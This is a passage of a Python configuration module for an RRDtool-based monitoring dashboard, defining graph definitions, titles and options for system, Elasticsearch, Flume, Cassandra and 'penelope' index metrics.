#'DEF:min=%(rrdpath)s/elb/latency_min.rrd:sum:AVERAGE',
#'DEF:max=%(rrdpath)s/elb/latency_max.rrd:sum:AVERAGE',
'DEF:avg=%(rrdpath)s/elb/latency_avg.rrd:sum:AVERAGE',
#'LINE:min#FF0000:Upstream latency (min)\\l',
#'LINE:max#0000FF:Upstream latency (max)\\l',
'LINE:avg#3333FF:Upstream latency (avg)\\l',
],
'metartg-processed': [
'DEF:processed=%(rrdpath)s/metartg/processed.rrd:sum:AVERAGE',
'DEF:queued=%(rrdpath)s/metartg/queued.rrd:sum:AVERAGE',
'LINE:processed#00FF00:Processed metrics\\l',
'LINE:queued#FF0000:Queued metrics\\l',
],
'elasticsearch-memory': [
'DEF:heap_committed=%(rrdpath)s/elasticsearch-memory/jvm.heap.committed.rrd:sum:AVERAGE',
'DEF:heap_used=%(rrdpath)s/elasticsearch-memory/jvm.heap.used.rrd:sum:AVERAGE',
'DEF:nonheap_committed=%(rrdpath)s/elasticsearch-memory/jvm.nonheap.committed.rrd:sum:AVERAGE',
'DEF:nonheap_used=%(rrdpath)s/elasticsearch-memory/jvm.nonheap.used.rrd:sum:AVERAGE',
'AREA:heap_used#006699:heap used\\l',
'LINE:heap_committed#FFFFFF:heap committed\\l',
'AREA:nonheap_used#009966:nonheap used\\l',
'LINE:nonheap_committed#F8FF47:nonheap committed\\l',
],
'elasticsearch-shards': [
'DEF:active_shards=%(rrdpath)s/elasticsearch-shards/active_shards.rrd:sum:AVERAGE',
'DEF:active_primary_shards=%(rrdpath)s/elasticsearch-shards/active_primary_shards.rrd:sum:AVERAGE',
'DEF:unassigned_shards=%(rrdpath)s/elasticsearch-shards/unassigned_shards.rrd:sum:AVERAGE',
'DEF:initializing_shards=%(rrdpath)s/elasticsearch-shards/initializing_shards.rrd:sum:AVERAGE',
'LINE:active_shards#006699FF:active shards\\l',
'LINE:active_primary_shards#837C04FF:active primary shards\\l',
'LINE:unassigned_shards#F51D30FF:unassigned shards\\l',
'LINE:initializing_shards#157419FF:initializing shards\\l',
],
'elasticsearch-gc': [
'DEF:gc_time=%(rrdpath)s/elasticsearch-gc/gc.collection.time.rrd:sum:AVERAGE',
'AREA:gc_time#4668E4FF:gc time (ms)\\l',
],
'elasticsearch-segments-count': [
'DEF:places_segment_count=%(rrdpath)s/elasticsearch-segments/places.segment.count.rrd:sum:AVERAGE',
'AREA:places_segment_count#009966:places count\\l',
'DEF:redirects_segment_count=%(rrdpath)s/elasticsearch-segments/redirects.segment.count.rrd:sum:AVERAGE',
'AREA:redirects_segment_count#006699:redirects count\\l',
],
'elasticsearch-segments-docs': [
'DEF:places_segment_docs=%(rrdpath)s/elasticsearch-segments/places.segment.docs.rrd:sum:AVERAGE',
'AREA:places_segment_docs#009966:places amount\\l',
'DEF:redirects_segment_docs=%(rrdpath)s/elasticsearch-segments/redirects.segment.docs.rrd:sum:AVERAGE',
'AREA:redirects_segment_docs#006699:redirects amount\\l',
],
'elasticsearch-segments-size': [
'DEF:places_segment_size=%(rrdpath)s/elasticsearch-segments/places.segment.size.rrd:sum:AVERAGE',
'AREA:places_segment_size#009966:places total segment size in MBs\\l',
'DEF:redirects_segment_size=%(rrdpath)s/elasticsearch-segments/redirects.segment.size.rrd:sum:AVERAGE',
'AREA:redirects_segment_size#006699:redirects total segment size in MBs\\l',
],
'flume-memory': [
'DEF:heap_committed=%(rrdpath)s/flume/jvm.mem.heap.committed.rrd:sum:AVERAGE',
'DEF:heap_used=%(rrdpath)s/flume/jvm.mem.heap.used.rrd:sum:AVERAGE',
'DEF:other_committed=%(rrdpath)s/flume/jvm.mem.other.committed.rrd:sum:AVERAGE',
'DEF:other_used=%(rrdpath)s/flume/jvm.mem.other.used.rrd:sum:AVERAGE',
'CDEF:other_committed_stack=heap_committed,other_committed,+',
'AREA:heap_used#006699:heap used\\l',
'LINE:heap_committed#FFFFFF:heap committed\\l',
'AREA:other_used#009966:nonheap used\\l:STACK',
'LINE:other_committed_stack#FFFFFF:nonheap committed\\l',
],
'flume-tailer': [
'DEF:events=%(rrdpath)s/flume/sg_api_tailer_api.events.rrd:sum:AVERAGE',
'LINE:events#00FF00:tail events\\l',
],
'flume-writer': [
'DEF:events=%(rrdpath)s/flume/sg_api_writer_api.events.rrd:sum:AVERAGE',
'DEF:appendSuccess=%(rrdpath)s/flume/sg_api_writer_api.appendSuccess.rrd:sum:AVERAGE',
'DEF:appendFails=%(rrdpath)s/flume/sg_api_writer_api.appendFails.rrd:sum:AVERAGE',
'DEF:appendRecovers=%(rrdpath)s/flume/sg_api_writer_api.appendRecovers.rrd:sum:AVERAGE',
'LINE:events#00FF00:writer events\\l',
'LINE:appendSuccess#FFFFFF:successful appends\\l',
'LINE:appendFails#FF0000:failed appends\\l',
'LINE:appendRecovers#FFFF00:recovered appends\\l',
],
}
RRD_LGRAPH_DEFS = {
'system-cpu': [
'DEF:cpu_user=%(rrdpath)s/cpu/user.rrd:sum:AVERAGE',
'VDEF:cpu_user_max=cpu_user,MAXIMUM',
'VDEF:cpu_user_95th=cpu_user,95,PERCENT',
'DEF:cpu_system=%(rrdpath)s/cpu/sys.rrd:sum:AVERAGE',
'VDEF:cpu_system_max=cpu_system,MAXIMUM',
'VDEF:cpu_system_95th=cpu_system,95,PERCENT',
'DEF:cpu_nice=%(rrdpath)s/cpu/nice.rrd:sum:AVERAGE',
'VDEF:cpu_nice_max=cpu_nice,MAXIMUM',
'VDEF:cpu_nice_95th=cpu_nice,95,PERCENT',
'DEF:cpu_iowait=%(rrdpath)s/cpu/iowait.rrd:sum:AVERAGE',
'VDEF:cpu_iowait_max=cpu_iowait,MAXIMUM',
'VDEF:cpu_iowait_95th=cpu_iowait,95,PERCENT',
'DEF:cpu_steal=%(rrdpath)s/cpu/steal.rrd:sum:AVERAGE',
'VDEF:cpu_steal_max=cpu_steal,MAXIMUM',
'VDEF:cpu_steal_95th=cpu_steal,95,PERCENT',
'AREA:cpu_system#FF6600:CPU system:STACK',
'GPRINT:cpu_system:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_system:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_system_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_system_95th:95th\\: %%8.2lf %%%%\\c',
'AREA:cpu_nice#FFCC00:CPU nice :STACK',
'GPRINT:cpu_nice:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_nice:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_nice_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_nice_95th:95th\\: %%8.2lf %%%%\\c',
'AREA:cpu_user#FFFF66:CPU user :STACK',
'GPRINT:cpu_user:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_user:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_user_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_user_95th:95th\\: %%8.2lf %%%%\\c',
'AREA:cpu_iowait#FF5555:CPU iowait:STACK',
'GPRINT:cpu_iowait:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_iowait:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_iowait_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_iowait_95th:95th\\: %%8.2lf %%%%\\c',
'AREA:cpu_steal#EA8F00:CPU steal :STACK',
'GPRINT:cpu_steal:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:cpu_steal:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:cpu_steal_max:Max\\: %%8.2lf %%%%',
'GPRINT:cpu_steal_95th:95th\\: %%8.2lf %%%%\\c',
],
'sar-io': [
'DEF:iowait=%(rrdpath)s/sar-cpu/iowait.rrd:sum:AVERAGE',
'DEF:iowait_x=%(rrdpath)s/sar-cpu/iowait.rrd:sum:AVERAGE',
'VDEF:iowait_max=iowait,MAXIMUM',
'VDEF:iowait_95th=iowait,95,PERCENT',
'DEF:bread_s=%(rrdpath)s/sar-io/bytes_read_sec.rrd:sum:AVERAGE',
'CDEF:cdef_bread_s=bread_s,512,*,1048576,/',
'VDEF:cdef_bread_s_max=cdef_bread_s,MAXIMUM',
'VDEF:cdef_bread_s_95th=cdef_bread_s,95,PERCENT',
'DEF:bwrit_s=%(rrdpath)s/sar-io/bytes_written_sec.rrd:sum:AVERAGE',
'CDEF:cdef_bwrit_s=bwrit_s,512,*,1048576,/',
'VDEF:cdef_bwrit_s_max=cdef_bwrit_s,MAXIMUM',
'VDEF:cdef_bwrit_s_95th=cdef_bwrit_s,95,PERCENT',
'DEF:pswpin_s=%(rrdpath)s/sar-swapping/pages_swapped_in_sec.rrd:sum:AVERAGE',
'VDEF:pswpin_s_max=pswpin_s,MAXIMUM',
'VDEF:pswpin_s_95th=pswpin_s,95,PERCENT',
'DEF:pswpout_s=%(rrdpath)s/sar-swapping/pages_swapped_out_sec.rrd:sum:AVERAGE',
'VDEF:pswpout_s_max=pswpout_s,MAXIMUM',
'VDEF:pswpout_s_95th=pswpout_s,95,PERCENT',
'AREA:iowait#D8ACE0FF:CPU i/o wait',
'GPRINT:iowait:LAST:Cur\\: %%8.2lf %%%%',
'GPRINT:iowait:AVERAGE:Avg\\: %%8.2lf %%%%',
'GPRINT:iowait_max:Max\\: %%8.2lf %%%%',
'GPRINT:iowait_95th:95th\\: %%8.2lf %%%%\\c',
'LINE1:iowait_x#623465FF:',
'LINE1:cdef_bread_s#EA8F00FF:MB read/s ',
'GPRINT:cdef_bread_s:LAST:Cur\\: %%8.2lf %%s',
'GPRINT:cdef_bread_s:AVERAGE:Avg\\: %%8.2lf %%s',
'GPRINT:cdef_bread_s_max:Max\\: %%8.2lf %%s',
'GPRINT:cdef_bread_s_95th:95th\\: %%8.2lf %%s\\c',
'LINE1:cdef_bwrit_s#157419FF:MB written/s',
'GPRINT:cdef_bwrit_s:LAST:Cur\\: %%8.2lf %%s',
'GPRINT:cdef_bwrit_s:AVERAGE:Avg\\: %%8.2lf %%s',
'GPRINT:cdef_bwrit_s_max:Max\\: %%8.2lf %%s',
'GPRINT:cdef_bwrit_s_95th:95th\\: %%8.2lf %%s\\c',
'LINE1:pswpin_s#4444FFFF:Swap in/s ',
'GPRINT:pswpin_s:LAST:Cur\\: %%8.2lf %%s',
'GPRINT:pswpin_s:AVERAGE:Avg\\: %%8.2lf %%s',
'GPRINT:pswpin_s_max:Max\\: %%8.2lf %%s',
'GPRINT:pswpin_s_95th:95th\\: %%8.2lf %%s\\c',
'LINE1:pswpout_s#7EE600FF:Swap out/s ',
'GPRINT:pswpout_s:LAST:Cur\\: %%8.2lf %%s',
'GPRINT:pswpout_s:AVERAGE:Avg\\: %%8.2lf %%s',
'GPRINT:pswpout_s_max:Max\\: %%8.2lf %%s',
'GPRINT:pswpout_s_95th:95th\\: %%8.2lf %%s\\c',
],
'elasticsearch-memory': [
'DEF:heap_committed=%(rrdpath)s/elasticsearch-memory/jvm.heap.committed.rrd:sum:AVERAGE',
'VDEF:heap_committed_max=heap_committed,MAXIMUM',
'VDEF:heap_committed_95th=heap_committed,95,PERCENT',
'DEF:heap_used=%(rrdpath)s/elasticsearch-memory/jvm.heap.used.rrd:sum:AVERAGE',
'VDEF:heap_used_max=heap_used,MAXIMUM',
'VDEF:heap_used_95th=heap_used,95,PERCENT',
'DEF:nonheap_committed=%(rrdpath)s/elasticsearch-memory/jvm.nonheap.committed.rrd:sum:AVERAGE',
'VDEF:nonheap_committed_max=nonheap_committed,MAXIMUM',
'VDEF:nonheap_committed_95th=nonheap_committed,95,PERCENT',
'DEF:nonheap_used=%(rrdpath)s/elasticsearch-memory/jvm.nonheap.used.rrd:sum:AVERAGE',
'VDEF:nonheap_used_max=nonheap_used,MAXIMUM',
'VDEF:nonheap_used_95th=nonheap_used,95,PERCENT',
'AREA:heap_used#006699:heap used ',
'GPRINT:heap_used:LAST:Cur\\: %%8.2lf %%sB',
'GPRINT:heap_used:AVERAGE:Avg\\: %%8.2lf %%sB',
'GPRINT:heap_used_max:Max\\: %%8.2lf %%sB',
'GPRINT:heap_used_95th:95th\\: %%8.2lf %%sB\\c',
'AREA:nonheap_used#009966:nonheap used ',
'GPRINT:nonheap_used:LAST:Cur\\: %%8.2lf %%sB',
'GPRINT:nonheap_used:AVERAGE:Avg\\: %%8.2lf %%sB',
'GPRINT:nonheap_used_max:Max\\: %%8.2lf %%sB',
'GPRINT:nonheap_used_95th:95th\\: %%8.2lf %%sB\\c',
'LINE:heap_committed#FFFFFF:heap committed ',
'GPRINT:heap_committed:LAST:Cur\\: %%8.2lf %%sB',
'GPRINT:heap_committed:AVERAGE:Avg\\: %%8.2lf %%sB',
'GPRINT:heap_committed_max:Max\\: %%8.2lf %%sB',
'GPRINT:heap_committed_95th:95th\\: %%8.2lf %%sB\\c',
'LINE:nonheap_committed#F8FF47:nonheap committed',
'GPRINT:nonheap_committed:LAST:Cur\\: %%8.2lf %%sB',
'GPRINT:nonheap_committed:AVERAGE:Avg\\: %%8.2lf %%sB',
'GPRINT:nonheap_committed_max:Max\\: %%8.2lf %%sB',
'GPRINT:nonheap_committed_95th:95th\\: %%8.2lf %%sB\\c',
],
'elasticsearch-gc': [
'DEF:gc_time=%(rrdpath)s/elasticsearch-gc/gc.collection.time.rrd:sum:AVERAGE',
'VDEF:gc_time_max=gc_time,MAXIMUM',
'VDEF:gc_time_95th=gc_time,95,PERCENT',
'AREA:gc_time#4668E4FF:gc time (ms)',
'GPRINT:gc_time:LAST:Cur\\: %%8.2lf ms',
'GPRINT:gc_time:AVERAGE:Avg\\: %%8.2lf ms',
'GPRINT:gc_time_max:Max\\: %%8.2lf ms',
'GPRINT:gc_time_95th:95th\\: %%8.2lf ms\\c',
],
}
RRD_GRAPH_OPTIONS = {
'system-cpu': ['--upper-limit', '100.0'],
'sar-io': ['--base', '1000', '--slope-mode', '--upper-limit', '80', '--alt-autoscale-max'],
'sar-load': ['--base', '1000', '--slope-mode', '--upper-limit', '100', '--alt-autoscale-max'],
'sar-paging-other': ['--base', '1000'],
#'io': ['--upper-limit', '100.0']
}
RRD_GRAPH_TITLE = {
'network-bytes': '%(host)s | bytes in/out',
'network-packets': '%(host)s | packets in/out',
'system-cpu': '%(host)s | cpu %%',
'system-memory': '%(host)s | memory utilization',
'sar-io': '%(host)s | sar i/o',
'sar-load': '%(host)s | sar load average',
'sar-paging-io': '%(host)s | sar paging in/out',
'sar-paging-other': '%(host)s | sar paging other',
#'io': '%(host)s | disk i/o',
'redis-memory': '%(host)s | redis memory',
'redis-connections': '%(host)s | redis connections',
'cassandra-scores': '%(host)s | cassandra scores',
'elb-requests': '%(host)s | ELB requests/min',
'elb-latency': '%(host)s | ELB latency (seconds)',
'metartg-processed': '%(host)s | metrics processed per minute',
'elasticsearch-memory': '%(host)s | Elasticsearch Memory',
'elasticsearch-shards': '%(host)s | Elasticsearch Shards',
'elasticsearch-gc': '%(host)s | Elasticsearch Garbage Collection',
'elasticsearch-segments-size': '%(host)s | Elasticsearch Segment Sizes',
'elasticsearch-segments-count': '%(host)s | Elasticsearch Segment Amounts',
'elasticsearch-segments-docs': '%(host)s | Elasticsearch Segment Document Amounts',
'flume-memory': '%(host)s | Flume JVM memory',
'flume-tailer': '%(host)s | Flume tail source',
'flume-writer': '%(host)s | Flume HDFS writer',
}
RRD_GRAPH_TYPES = [
('system-cpu', 'CPU'),
('system-memory', 'Memory'),
('sar-io', 'I/O'),
('sar-load', 'Load Average'),
('sar-paging-io', 'Paging I/O'),
('sar-paging-other', 'Paging Other'),
('redis-memory', 'Memory'),
('redis-connections', 'Connections'),
('cassandra-scores', 'Scores'),
('elb-requests', 'ELB Requests'),
('elb-latency', 'ELB Latency'),
('metartg-processed', 'Processed'),
('network-bytes', 'Bytes tx/rx'),
('network-packets', 'Packets tx/rx'),
('elasticsearch-memory', 'Elasticsearch Memory'),
('elasticsearch-shards', 'Elasticsearch Shards'),
('elasticsearch-gc', 'Elasticsearch Garbage Collection'),
('elasticsearch-segments-size', 'Elasticsearch Segment Sizes'),
('elasticsearch-segments-count', 'Elasticsearch Segment Amounts'),
('elasticsearch-segments-docs', 'Elasticsearch Segment Document Amounts'),
('flume-memory', 'Flume JVM memory'),
('flume-tailer', 'Flume tail source'),
('flume-writer', 'Flume HDFS writer'),
# ('io', 'Disk I/O'),
# ('redis-memory', 'Redis memory'),
]
tpstats_list = [
'AE-SERVICE-STAGE',
'CONSISTENCY-MANAGER',
'FLUSH-SORTER-POOL',
'FLUSH-WRITER-POOL',
'GMFD',
'HINTED-HANDOFF-POOL',
'LB-OPERATIONS',
'LB-TARGET',
'LOAD-BALANCER-STAGE',
'MEMTABLE-POST-FLUSHER',
'MESSAGE-STREAMING-POOL',
'METADATA-MUTATION-STAGE',
'MISCELLANEOUS-POOL',
'PENELOPE-STAGE',
'RESPONSE-STAGE',
'ROW-MUTATION-STAGE',
'ROW-READ-STAGE',
'STREAM-STAGE',
'THRIFT',
]
for tpstats in tpstats_list:
RRD_GRAPH_DEFS['cassandra-tpstats-' + tpstats] = [
'DEF:pending=%%(rrdpath)s/cassandra_tpstats/%s_PendingTasks.rrd:sum:AVERAGE' % tpstats,
'DEF:active=%%(rrdpath)s/cassandra_tpstats/%s_ActiveCount.rrd:sum:AVERAGE' % tpstats,
'LINE:pending#FF6600:%s pending\\l' % tpstats,
'LINE:active#66FF00:%s active\\l' % tpstats,
]
RRD_GRAPH_DEFS['cassandra-tpstats-%s-completed' % tpstats] = [
'DEF:completed=%%(rrdpath)s/cassandra_tpstats/%s_CompletedTasks.rrd:sum:AVERAGE' % tpstats,
'LINE:completed#0066FF:%s completed\\l' % tpstats,
]
RRD_GRAPH_TITLE['cassandra-tpstats-' + tpstats] = '%%(host)s | cassandra %s' % tpstats
RRD_GRAPH_TITLE['cassandra-tpstats-%s-completed' % tpstats] = '%%(host)s | cassandra %s completed' % tpstats
RRD_GRAPH_TYPES.append(('cassandra-tpstats-' + tpstats, tpstats))
RRD_GRAPH_TYPES.append(('cassandra-tpstats-%s-completed' % tpstats, '%s completed' % tpstats))
sstables_list = {}
path = RRDPATH % {
'host': '*',
'service': 'cassandra_sstables',
'metric': '*',
}
for filename in glob(path):
filename = os.path.basename(filename)
k = filename.split('.', 3)[:2]
sstables_list[tuple(k)] = None
sstables_list = sstables_list.keys()
# ks = keyspace
# cf = columnfamily
for ks, cf in sstables_list:
RRD_GRAPH_DEFS['cassandra-sstables-%s-%s-minmaxavg' % (ks, cf)] = [
'DEF:min=%%(rrdpath)s/cassandra_sstables/%s.%s.min.rrd:sum:AVERAGE' % (ks, cf),
'DEF:max=%%(rrdpath)s/cassandra_sstables/%s.%s.max.rrd:sum:AVERAGE' % (ks, cf),
'DEF:avg=%%(rrdpath)s/cassandra_sstables/%s.%s.avg.rrd:sum:AVERAGE' % (ks, cf),
'LINE:min#66FFFF:sstable size (min)\\l',
'LINE:max#FF6600:sstable size (max)\\l',
'LINE:avg#66FF00:sstable size (avg)\\l',
]
RRD_GRAPH_DEFS['cassandra-sstables-%s-%s-total' % (ks, cf)] = [
'DEF:total=%%(rrdpath)s/cassandra_sstables/%s.%s.total.rrd:sum:AVERAGE' % (ks, cf),
'LINE:total#EA8F00:sstable size (total)\\l',
]
RRD_GRAPH_DEFS['cassandra-sstables-%s-%s-count' % (ks, cf)] = [
'DEF:count=%%(rrdpath)s/cassandra_sstables/%s.%s.count.rrd:sum:AVERAGE' % (ks, cf),
'LINE:count#00FF00:sstable count\\l',
]
RRD_GRAPH_TITLE['cassandra-sstables-%s-%s-minmaxavg' % (ks, cf)] = '%%(host)s | %s %s size (min/max/avg)' % (ks, cf)
RRD_GRAPH_TITLE['cassandra-sstables-%s-%s-total' % (ks, cf)] = '%%(host)s | %s %s size (total)' % (ks, cf)
RRD_GRAPH_TITLE['cassandra-sstables-%s-%s-count' % (ks, cf)] = '%%(host)s | %s %s count' % (ks, cf)
RRD_GRAPH_TYPES.append(('cassandra-sstables-%s-%s-minmaxavg' % (ks, cf), '%s %s min/max/avg' % (ks, cf)))
RRD_GRAPH_TYPES.append(('cassandra-sstables-%s-%s-total' % (ks, cf), '%s %s total' % (ks, cf)))
RRD_GRAPH_TYPES.append(('cassandra-sstables-%s-%s-count' % (ks, cf), '%s %s count' % (ks, cf)))
# Commit log graphs
RRD_GRAPH_DEFS['cassandra-commitlog-pending'] = [
'DEF:pending=%(rrdpath)s/cassandra_commitlog/tasks.pending.rrd:sum:AVERAGE',
'LINE:pending#FF0000:tasks pending\\l',
]
RRD_GRAPH_TITLE['cassandra-commitlog-pending'] = '%(host)s | Commitlog - Pending'
RRD_GRAPH_TYPES.append(('cassandra-commitlog-pending', 'Commitlog Pending'))
RRD_GRAPH_DEFS['cassandra-commitlog-completed'] = [
'DEF:completed=%(rrdpath)s/cassandra_commitlog/tasks.completed.rrd:sum:AVERAGE',
'LINE:completed#55FF55:tasks completed\\l',
]
RRD_GRAPH_TITLE['cassandra-commitlog-completed'] = '%(host)s | Commitlog - Completed'
RRD_GRAPH_TYPES.append(('cassandra-commitlog-completed', 'Commitlog Completed'))
# Streaming graphs
RRD_GRAPH_DEFS['cassandra-streaming'] = [
'DEF:from=%(rrdpath)s/cassandra_streaming/streaming.from.rrd:sum:AVERAGE',
'DEF:to=%(rrdpath)s/cassandra_streaming/streaming.to.rrd:sum:AVERAGE',
'LINE:from#55FF55:from\\l',
'LINE:to#FF5555:to\\l',
]
RRD_GRAPH_TITLE['cassandra-streaming'] = '%(host)s | Streaming Activity'
RRD_GRAPH_TYPES.append(('cassandra-streaming', 'Streaming Activity'))
# Compaction graphs
RRD_GRAPH_DEFS['cassandra-compaction'] = [
'DEF:compacting=%(rrdpath)s/cassandra_compaction/bytes.compacting.rrd:sum:AVERAGE',
'DEF:remaining=%(rrdpath)s/cassandra_compaction/bytes.remaining.rrd:sum:AVERAGE',
'LINE:compacting#55FF55:compacting\\l',
'LINE:remaining#FF5555:remaining\\l',
]
RRD_GRAPH_TITLE['cassandra-compaction'] = '%(host)s | Compaction Activity'
RRD_GRAPH_TYPES.append(('cassandra-compaction', 'Compaction Activity'))
RRD_GRAPH_DEFS['cassandra-compaction-tasks'] = [
'DEF:pending=%(rrdpath)s/cassandra_compaction/tasks.pending.rrd:sum:AVERAGE',
'LINE:pending#55FF55:pending\\l',
]
RRD_GRAPH_TITLE['cassandra-compaction-tasks'] = '%(host)s | Compaction Tasks'
RRD_GRAPH_TYPES.append(('cassandra-compaction-tasks', 'Compaction Tasks'))
# Heap graphs
RRD_GRAPH_DEFS['cassandra-memory'] = [
'DEF:heap_committed=%(rrdpath)s/cassandra_memory/jvm.heap.committed.rrd:sum:AVERAGE',
'DEF:heap_used=%(rrdpath)s/cassandra_memory/jvm.heap.used.rrd:sum:AVERAGE',
'DEF:nonheap_committed=%(rrdpath)s/cassandra_memory/jvm.nonheap.committed.rrd:sum:AVERAGE',
'DEF:nonheap_used=%(rrdpath)s/cassandra_memory/jvm.nonheap.used.rrd:sum:AVERAGE',
'CDEF:nonheap_committed_stack=heap_committed,nonheap_committed,+',
'AREA:heap_used#006699:heap used\\l',
'LINE:heap_committed#FFFFFF:heap committed\\l',
'AREA:nonheap_used#009966:nonheap used\\l:STACK',
'LINE:nonheap_committed_stack#FFFFFF:nonheap committed\\l',
]
RRD_GRAPH_TITLE['cassandra-memory'] = '%(host)s | Cassandra Memory'
RRD_GRAPH_TYPES.append(('cassandra-memory', 'Cassandra Memory'))
# penelope graphs
for op in ['index', 'unindex']:
RRD_GRAPH_DEFS['penelope-batch-%s' % op] = [
'DEF:attempt=%%(rrdpath)s/penelope/batch_%s_attempt\:count.rrd:sum:AVERAGE' % op,
'DEF:success=%%(rrdpath)s/penelope/batch_%s_success\:count.rrd:sum:AVERAGE' % op,
'CDEF:fail=attempt,success,-',
'AREA:success#66FF66:success\\l',
'AREA:fail#FF6666:fail\\l:STACK',
]
RRD_GRAPH_TITLE['penelope-batch-%s' % op] = '%%(host)s | batch_%s requests' % op
RRD_GRAPH_TYPES.append(('penelope-batch-%s' % op, 'Penelope batch_%s requests' % op))
for index_type in ['bplus', 'kdmulti']:
# hitrate for caches
RRD_GRAPH_DEFS['penelope-%s-cache-hitrate' % index_type] = [
'DEF:hitrate=%%(rrdpath)s/penelope/%s_nodecache_recent_hit_rate\:mean.rrd:sum:AVERAGE' % index_type,
'LINE:hitrate#66FF00:hitrate\\l',
]
RRD_GRAPH_TITLE['penelope-%s-cache-hitrate' % index_type] = '%%(host)s | %s cache hit rate' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-cache-hitrate' % index_type, 'Penelope %s cache hit rate' % index_type))
RRD_GRAPH_OPTIONS['penelope-%s-cache-hitrate' % index_type] = ['--upper-limit', '100.0', '--lower-limit', '0.0']
# size of node caches
RRD_GRAPH_DEFS['penelope-%s-cache-size' % index_type] = [
'DEF:items=%%(rrdpath)s/penelope/%s_nodecache_size\:mean.rrd:sum:AVERAGE' % index_type,
'AREA:items#9999FF:items\\l',
]
RRD_GRAPH_TITLE['penelope-%s-cache-size' % index_type] = '%%(host)s | %s node cache size' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-cache-size' % index_type, 'Penelope %s node cache size' % index_type))
# size of metadata caches
RRD_GRAPH_DEFS['penelope-%s-metadata-cache-size' % index_type] = [
'DEF:items=%%(rrdpath)s/penelope/%s_metadata_cache_size\:mean.rrd:sum:AVERAGE' % index_type,
'AREA:items#9999FF:items\\l',
]
RRD_GRAPH_TITLE['penelope-%s-metadata-cache-size' % index_type] = '%%(host)s | %s metadata cache size' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-metadata-cache-size' % index_type, 'Penelope %s metadata cache size' % index_type))
# eviction info
RRD_GRAPH_DEFS['penelope-%s-cache-evictions' % index_type] = [
'DEF:evictions=%%(rrdpath)s/penelope/%s_nodecache_evictions\:total.rrd:sum:AVERAGE' % index_type,
'LINE:evictions#FF0066:evictions/min\\l',
]
RRD_GRAPH_TITLE['penelope-%s-cache-evictions' % index_type] = '%%(host)s | %s cache evictions' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-cache-evictions' % index_type, 'Penelope %s cache evictions' % index_type))
# operation counters info
RRD_GRAPH_DEFS['penelope-%s-index' % index_type] = [
'DEF:index=%%(rrdpath)s/penelope/%s_index\:count.rrd:sum:AVERAGE' % index_type,
'LINE:index#66FF00:index operations/min\\l',
]
RRD_GRAPH_TITLE['penelope-%s-index' % index_type] = '%%(host)s | %s index operations' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-index' % index_type, 'Penelope %s index operations' % index_type))
# split info
RRD_GRAPH_DEFS['penelope-%s-split' % index_type] = [
'DEF:split=%%(rrdpath)s/penelope/%s_split\:count.rrd:sum:AVERAGE' % index_type,
'LINE:split#66FF00:tree splits/min\\l',
]
RRD_GRAPH_TITLE['penelope-%s-split' % index_type] = '%%(host)s | %s splits' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-split' % index_type, 'Penelope %s splits' % index_type))
# redirect info
RRD_GRAPH_DEFS['penelope-%s-index-redirect' % index_type] = [
'DEF:redirect=%%(rrdpath)s/penelope/%s_index_redirect\:count.rrd:sum:AVERAGE' % index_type,
'LINE:redirect#00FF66:redirects/min\\l',
]
RRD_GRAPH_TITLE['penelope-%s-index-redirect' % index_type] = '%%(host)s | %s index redirects' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-index-redirect' % index_type, 'Penelope %s index redirects' % index_type))
# metadata read rates
RRD_GRAPH_DEFS['penelope-%s-metadata-reads' % index_type] = [
'DEF:local=%%(rrdpath)s/penelope/%s_metadata_local_read\:count.rrd:sum:AVERAGE' % index_type,
'DEF:remote=%%(rrdpath)s/penelope/%s_metadata_remote_read\:count.rrd:sum:AVERAGE' % index_type,
'DEF:retry=%%(rrdpath)s/penelope/%s_metadata_retry\:count.rrd:sum:AVERAGE' % index_type,
'AREA:local#66FF00:local reads/min\\l',
'AREA:remote#6600FF:remote reads/min\\l:STACK',
'AREA:retry#FF6666:retried remote reads/min\\l:STACK',
]
RRD_GRAPH_TITLE['penelope-%s-metadata-reads' % index_type] = '%%(host)s | %s metadata reads' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-metadata-reads' % index_type, 'Penelope %s metadata reads' % index_type))
# metadata read duration
RRD_GRAPH_DEFS['penelope-%s-metadata-read-duration' % index_type] = [
'DEF:local_min=%%(rrdpath)s/penelope/%s_metadata_local_read_duration\:min.rrd:sum:AVERAGE' % index_type,
'DEF:local_mean=%%(rrdpath)s/penelope/%s_metadata_local_read_duration\:mean.rrd:sum:AVERAGE' % index_type,
'DEF:local_max=%%(rrdpath)s/penelope/%s_metadata_local_read_duration\:max.rrd:sum:AVERAGE' % index_type,
'DEF:remote_min=%%(rrdpath)s/penelope/%s_metadata_remote_read_duration\:min.rrd:sum:AVERAGE' % index_type,
'DEF:remote_mean=%%(rrdpath)s/penelope/%s_metadata_remote_read_duration\:mean.rrd:sum:AVERAGE' % index_type,
'DEF:remote_max=%%(rrdpath)s/penelope/%s_metadata_remote_read_duration\:max.rrd:sum:AVERAGE' % index_type,
'LINE:local_mean#66FF00:local reads mean ms\\l',
'LINE:local_max#FFFF00:local reads max ms\\l',
'LINE:remote_mean#6600FF:remote reads mean ms\\l',
'LINE:remote_max#FF00FF:remote reads max ms \\l',
]
RRD_GRAPH_TITLE['penelope-%s-metadata-read-duration' % index_type] = '%%(host)s | %s metadata read duration' % index_type
RRD_GRAPH_TYPES.append(('penelope-%s-metadata-read-duration' % index_type, 'Penelope %s metadata read duration' % index_type))
# metadata invalidation info
RRD_GRAPH_DEFS['penelope-%s-metadata-invalidation' % index_type] = [
